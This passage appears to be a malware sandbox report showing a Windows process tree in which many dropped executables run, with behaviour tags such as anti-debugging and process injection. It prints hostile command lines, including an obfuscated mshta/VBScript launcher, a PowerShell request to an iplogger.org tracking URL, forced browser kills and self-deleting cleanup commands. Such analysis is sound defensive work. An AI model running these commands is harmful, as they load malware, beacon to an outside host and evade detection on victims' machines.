                    - C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\System32\mshta.exe" vbsCrIPT:CLOse( crEateOBjeCt ( "wScrIPT.SHELL" ). RuN( "C:\Windows\system32\cmd.exe /c TYpE ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj & IF ""-pHMKPyuuVVnjhxYIEreJKQmnfTDzj""== """" for %w In ( ""C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe"" ) do taskkill /F -iM ""%~nxw"" " , 0, tRUE ) )
                      PID:6668
                      - C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c TYpE "C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" >CndH5V.EXe && Start Cndh5V.EXE -pHMKPyuuVVnjhxYIEreJKQmnfTDzj&IF "-pHMKPyuuVVnjhxYIEreJKQmnfTDzj"== "" for %w In ("C:\Users\Admin\AppData\Local\Temp\CndH5V.EXe" ) do taskkill /F -iM "%~nxw"
                        PID:9556
                    - C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\System32\rundll32.exe" bFut_Y.g_U,GpozpZJ
                      - Loads dropped DLL
                      PID:9432
                  - C:\Windows\SysWOW64\taskkill.exe
                    taskkill /F -iM "usyw5ZngVKxU1DoBnfAsyAxL.exe"
                    - Kills process with taskkill
                    PID:8644
            - C:\Users\Admin\Documents\2rrWk6aWyhXCRt7PpjtUduKG.exe
              "C:\Users\Admin\Documents\2rrWk6aWyhXCRt7PpjtUduKG.exe"
              PID:7900
            - C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe
              "C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe"
              PID:7892
              - C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe
                "C:\Users\Admin\Documents\59vTTgxQkNQc5rmC6nQhRefv.exe"
                - Modifies data under HKEY_USERS
                PID:16672
            - C:\Users\Admin\Documents\AYcoRdCUFo3EVft6taKBoNmp.exe
              "C:\Users\Admin\Documents\AYcoRdCUFo3EVft6taKBoNmp.exe"
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:7884
            - C:\Users\Admin\Documents\kgFoGuhcdrrxNuBNV0pnzt35.exe
              "C:\Users\Admin\Documents\kgFoGuhcdrrxNuBNV0pnzt35.exe"
              - Executes dropped EXE
              PID:7872
            - C:\Users\Admin\Documents\RukWAObiV_pk8jgtTfDBZo9L.exe
              "C:\Users\Admin\Documents\RukWAObiV_pk8jgtTfDBZo9L.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              PID:7864
              - C:\Windows\SysWOW64\cmd.exe
                "cmd" /c start "" "wwi.exe" & start "" "wwl.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"
                PID:6352
                - C:\Users\Admin\AppData\Local\Temp\wwi.exe
                  "wwi.exe"
                  - Checks BIOS information in registry
                  - Checks whether UAC is enabled
                  - Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:8920
                - C:\Users\Admin\AppData\Local\Temp\wwl.exe
                  "wwl.exe"
                  - Checks BIOS information in registry
                  - Checks whether UAC is enabled
                  - Suspicious use of NtSetInformationThreadHideFromDebugger
                  PID:9036
                - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1ZpGf7"
                  - Blocklisted process makes network request
                  PID:9184
            - C:\Users\Admin\Documents\wVv8AImVlR_dbDz6BgqJ11oz.exe
              "C:\Users\Admin\Documents\wVv8AImVlR_dbDz6BgqJ11oz.exe"
              - Executes dropped EXE
              PID:7856
            - C:\Users\Admin\Documents\yT0Jr6qhYrzdROOogtndOL8l.exe
              "C:\Users\Admin\Documents\yT0Jr6qhYrzdROOogtndOL8l.exe"
              - Executes dropped EXE
              PID:7848
              - C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c taskkill /f /im chrome.exe
                PID:9832
                - C:\Windows\SysWOW64\taskkill.exe
                  taskkill /f /im chrome.exe
                  - Kills process with taskkill
                  PID:11216
            - C:\Users\Admin\Documents\ItAFNrv2sOXUt7aWaBN3nK6S.exe
              "C:\Users\Admin\Documents\ItAFNrv2sOXUt7aWaBN3nK6S.exe"
              - Executes dropped EXE
              PID:7840
            - C:\Users\Admin\Documents\XgjnLxbzwVfuidtVtZ1khfTK.exe
              "C:\Users\Admin\Documents\XgjnLxbzwVfuidtVtZ1khfTK.exe"
              - Executes dropped EXE
              - Drops file in Program Files directory
              PID:7832
              - C:\Program Files (x86)\Company\NewProduct\inst001.exe
                "C:\Program Files (x86)\Company\NewProduct\inst001.exe"
                PID:8672
              - C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                - Checks whether UAC is enabled
                - Drops file in Program Files directory
                PID:8664
              - C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                PID:8656
            - C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe
              "C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              PID:7816
              - C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe
                "C:\Users\Admin\Documents\dX9c0VLsY6QZmDeHO24bcfz5.exe"
                - Checks SCSI registry key(s)
                - Suspicious behavior: MapViewOfSection
                PID:6988
            - C:\Users\Admin\Documents\jtW2SlgNdt8N1bR8cmz07mY3.exe
              "C:\Users\Admin\Documents\jtW2SlgNdt8N1bR8cmz07mY3.exe"
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:8084
            - C:\Users\Admin\Documents\Tj3Ec2O1wj9zalzscQdK5sK5.exe
              "C:\Users\Admin\Documents\Tj3Ec2O1wj9zalzscQdK5sK5.exe"
              PID:8076
            - C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe
              "C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe"
              - Suspicious use of SetThreadContext
              PID:8068
              - C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe
                C:\Users\Admin\Documents\7XVoCk2M083myR3PeWtGmlcK.exe
                PID:9056
            - C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe
              "C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe"
              - Executes dropped EXE
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              - Suspicious use of SetThreadContext
              PID:7568
              - C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe
                "C:\Users\Admin\Documents\mG10dmTajtqdi6FuJgXzFaN5.exe"
                PID:4428
            - C:\Users\Admin\Documents\rePWGAeA9gG8Y413QzXTBROs.exe
              "C:\Users\Admin\Documents\rePWGAeA9gG8Y413QzXTBROs.exe"
              - Executes dropped EXE
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:7560
            - C:\Users\Admin\Documents\nRYNXU8kXWDM9ct7FinhQA1L.exe
              "C:\Users\Admin\Documents\nRYNXU8kXWDM9ct7FinhQA1L.exe"
              - Executes dropped EXE
              - Loads dropped DLL
              - Checks processor information in registry
              PID:7552
              - C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c taskkill /im nRYNXU8kXWDM9ct7FinhQA1L.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\nRYNXU8kXWDM9ct7FinhQA1L.exe" & del C:\ProgramData\*.dll & exit
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                PID:3496
                - C:\Windows\SysWOW64\taskkill.exe
                  taskkill /im nRYNXU8kXWDM9ct7FinhQA1L.exe /f
                  - Kills process with taskkill
                  PID:9312
                - C:\Windows\SysWOW64\timeout.exe
                  timeout /t 6
                  - Delays execution with timeout.exe
                  PID:16752
            - C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe
              "C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe"
              PID:7540
              - C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe
                "C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe"
                - Loads dropped DLL
                - Checks processor information in registry
                PID:4088
                - C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /im 30m_VqBd5yyKL_Q269RMiiX0.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\30m_VqBd5yyKL_Q269RMiiX0.exe" & del C:\ProgramData\*.dll & exit
                  PID:7132
                  - C:\Windows\SysWOW64\taskkill.exe
                    taskkill /im 30m_VqBd5yyKL_Q269RMiiX0.exe /f
                    - Kills process with taskkill
                    PID:11080
                  - C:\Windows\SysWOW64\timeout.exe
                    timeout /t 6
                    - Delays execution with timeout.exe
                    PID:17592
            - C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe
              "C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"
              PID:7528
              - C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                PID:4672
                - C:\Program Files\Mozilla Firefox\firefox.exe
                  "C:\Program Files\Mozilla Firefox\firefox.exe"
                  PID:8580
              - C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                - Enumerates system info in registry
                - Suspicious use of FindShellTrayWindow
                PID:5484
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd6dcfa380,0x7ffd6dcfa390,0x7ffd6dcfa3a0
                  PID:9300
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1840 /prefetch:2
                  - Suspicious use of SetThreadContext
                  PID:9748
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1904 /prefetch:8
                  PID:8788
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1892 /prefetch:8
                  PID:4972
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2568 /prefetch:1
                  PID:6664
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2576 /prefetch:1
                  PID:492
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=2 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3080 /prefetch:1
                  PID:9368
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
                  PID:10284
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                  PID:10404
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                  PID:10448
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4792 /prefetch:8
                  PID:10660
                - C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe
                  "C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel=stable --force-configure-user-settings
                  PID:7060
                  - C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe
                    "C:\Program Files\Google\Chrome\Application\93.0.4577.63\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=93.0.4577.63 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff634e26ee0,0x7ff634e26ef0,0x7ff634e26f00
                    PID:11696
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3384 /prefetch:8
                  PID:11688
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAQAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4220 /prefetch:2
                  PID:11852
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1984 /prefetch:8
                  PID:11828
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1984 /prefetch:8
                  PID:4320
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3728 /prefetch:8
                  PID:6440
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4224 /prefetch:8
                  PID:4844
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5896 /prefetch:8
                  PID:7084
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3932 /prefetch:8
                  PID:12104
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3896 /prefetch:8
                  PID:1004
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3996 /prefetch:8
                  PID:11696
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4968 /prefetch:8
                  PID:9360
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:8
                  PID:12400
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3744 /prefetch:8
                  PID:11968
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3952 /prefetch:8
                  PID:8752
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5116 /prefetch:8
                  PID:12912
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3944 /prefetch:8
                  PID:12192
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3908 /prefetch:8
                  PID:12916
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6076 /prefetch:8
                  PID:2204
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3872 /prefetch:8
                  PID:8392
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6468 /prefetch:8
                  PID:7476
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1692 /prefetch:8
                  PID:9936
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:8
                  PID:12848
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6848 /prefetch:8
                  PID:6208
                - C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4220 /prefetch:8
                  PID:11204
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6900 /prefetch:89⤵PID:10452
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6996 /prefetch:89⤵PID:9880
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3348 /prefetch:89⤵PID:11636
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4352 /prefetch:89⤵PID:17836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7084 /prefetch:89⤵PID:1464
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6880 /prefetch:89⤵PID:18632
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6192 /prefetch:89⤵PID:18688
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1964 /prefetch:89⤵PID:18764
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7064 /prefetch:89⤵PID:19052
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3808 /prefetch:89⤵PID:19196
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3788 /prefetch:89⤵PID:19120
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:19⤵PID:13268
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --field-trial-handle=1824,16751320107970052658,7711265419694386700,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4004 /prefetch:19⤵PID:13040
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7528 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"8⤵PID:9688
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 75289⤵
- Kills process with taskkill
PID:10552 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7528 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\w6ybmxEISsSbaDI6yaHIE9ww.exe"8⤵PID:10916
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 75289⤵
- Kills process with taskkill
PID:12316 -
C:\Users\Admin\Documents\1LmD_gnw4q8R9TJXTApySnvK.exe"C:\Users\Admin\Documents\1LmD_gnw4q8R9TJXTApySnvK.exe"7⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:7508 -
C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"C:\Users\Admin\Documents\qT3dWYBP7ZsuOrwW4ZcUbjl6.exe"8⤵
- Checks computer location settings
PID:9884 -
